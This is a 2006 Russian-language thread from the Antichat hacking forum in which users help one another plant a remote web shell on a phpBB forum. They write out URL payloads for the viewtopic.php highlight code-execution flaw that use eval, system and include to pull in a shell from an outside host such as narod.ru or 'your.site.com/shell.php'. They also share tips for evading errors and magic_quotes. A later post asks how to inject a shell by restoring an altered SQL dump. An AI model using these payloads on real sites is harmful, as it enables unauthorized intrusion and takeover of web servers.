Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
Проблемы с заливкой шелла на phpbb |
11.10.2006, 22:18
|
|
Познающий
Регистрация: 11.10.2006
Сообщений: 35
Провел на форуме:
60100
Репутация:
9
|
|
Проблемы с заливкой шелла на phpbb
Приет.
У меня проблемы с заливкой шеллла на форум phpbb
Хотинг находится на hut.ru. Там вроде как помню запрещено ссылатся на удаленные файлы.
пишу в строку такой код "http://www.ля-ля-ля.ru/viewtopic.php?xxx=wget%20http://ля-ля-ля.narod.ru/remview.php &p=12&highlight=%2527.system($_GET[xxx]).include%2527"
Вылазеет ошибки как и надо:
Код:
Warning: Unknown()\b#i): failed to open stream: No such file or directory in /home/Z/ewfefe.ru/WWW/viewtopic.php(1104) : regexp code on line 1
Warning: (null)(): Failed opening ')\b#i' for inclusion (include_path='.:') in /home/z/ewfewfe.ru/WWW/viewtopic.php(1104) : regexp code on line 1
Warning: No ending delimiter '#' found in /home/z/ewfewfew.ru/WWW/viewtopic.php(1104) : regexp code on line 2
Но файл не заливается на сервак.
Что делать? можно ли через viewtopic получить хотябы хеш админа?
Заранее ОЧЕНЬ! благодарен.
Последний раз редактировалось AlexCRC; 11.10.2006 в 22:20..
|
|
|
11.10.2006, 22:27
|
|
Постоянный
Регистрация: 27.07.2006
Сообщений: 405
Провел на форуме:
1377321
Репутация:
268
|
|
http://ля-ля-ля.narod.ru/remview.php
Народ не поддерживает php
|
|
|
|
11.10.2006, 22:31
|
|
Познающий
Регистрация: 11.10.2006
Сообщений: 35
Провел на форуме:
60100
Репутация:
9
|
|
Народ не поддерживает php
Ну так из-за этого и выбрал народ. Если поставлю с поддержкой php - то он отдаст выполненый скрипт 
|
|
|
|
11.10.2006, 22:31
|
|
OpenVPN.CC
Регистрация: 15.07.2005
Сообщений: 1,599
Провел на форуме:
7670961
Репутация:
1034
|
|
Меняй разрешение на шеле не php а txt тоесть remview.txt
|
|
|
|
11.10.2006, 22:32
|
|
Time out
Регистрация: 28.11.2005
Сообщений: 547
Провел на форуме:
2320925
Репутация:
1348
|
|
Да, не поддерживает, само собой, кроме того увидел странную конструкцию -
highlight=%2527.system($_GET[xxx]).include%2527"
viewtopic.php?t=2206&highlight=%2527.eval($_GET[c1]).%2527&c1=include($_GET[c2])&c2=http://your.site.com/shell.php
Вот это верный вариант, на будущее, переменные с1 и с2 лучше кавычками не обрамлять, ибо на серевер может стоять опция magic_quotes=on, которая будет добавлять к каждой твоей кавчыка слеш, что портит код и препятствует его исполнению.
И как указано выше, пробуй, конечно, расширение шелла менять на txt - предварительно создав файл shell.txt
__________________
Нельзя считать себя достаточно взрослым, если у тебя школьные фотографии - цифровые.
|
|
|
|
11.10.2006, 22:34
|
|
Познавший АНТИЧАТ
Регистрация: 25.08.2006
Сообщений: 1,524
Провел на форуме:
3405508
Репутация:
1745
|
|
давай на jino-net.ru
|
|
|
|
11.10.2006, 22:42
|
|
Познающий
Регистрация: 11.10.2006
Сообщений: 35
Провел на форуме:
60100
Репутация:
9
|
|
Непомогло 
Ни переименование файла, ни изменение кода
Код:
Parse error: parse error, unexpected $ in /home/z/ыshthj.ru/WWW/viewtopic.php(1104) : regexp code(1) : eval()'d code on line 1
Ссылки все правильные
Последний раз редактировалось AlexCRC; 11.10.2006 в 22:45..
|
|
|
|
11.10.2006, 23:30
|
|
Познающий
Регистрация: 11.10.2006
Сообщений: 35
Провел на форуме:
60100
Репутация:
9
|
|
Люди помогите а?
Вот мой шелл: http://scriptmyphp.narod.ru/remview.php и он же http://scriptmyphp.narod.ru/remview.txt
Запрос такой:
Код:
http://Name.ru/viewtopic.php?t=12&highlight=%2527.eval($_GET[c1]).%2527&c1=include($_GET[c2])&c2=http://scriptmyphp.narod.ru/remview.txt
Запрос правильный?
Выводится
Код:
Parse error: parse error, unexpected $ in /home/z/ыshthj.ru/WWW/viewtopic.php(1104) : regexp code(1) : eval()'d code on line 1
|
|
|
|
21.10.2006, 17:37
|
|
Познающий
Регистрация: 21.10.2006
Сообщений: 62
Провел на форуме:
346258
Репутация:
22
|
|
Не стал создавать новую тему.
Вопрос все тот же - заливка шела через админ панель phpBB.
На форуме предлагается заливать посредством SQL =====> Дам базы формума - Внесение в дамп код шела - Рестор подправленной базы.
Послкольку сам я никогда с этим дела не имел, вопрос в следующем:
Необходимо ресторить дамп базы всего форума или же будет достаточно дапма содержащего толко sql запрос на запись шела?
Вопрос назрел потому, что дамп весит больше 100Мг в неупакованном виде (gzip запрещен). Не понятно каким образом происходит рестор - это полное стирание существующего с последующей добавлением, или же - добавление и перезапись уже существующего. Если первое, то после ресторе дампа содержащего лишь код шела будет пустой форум, что не хотелось бы. Вопрос скорее касается не phpBB, а SQL в целом.
Последний раз редактировалось naqnaq; 21.10.2006 в 17:59..
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
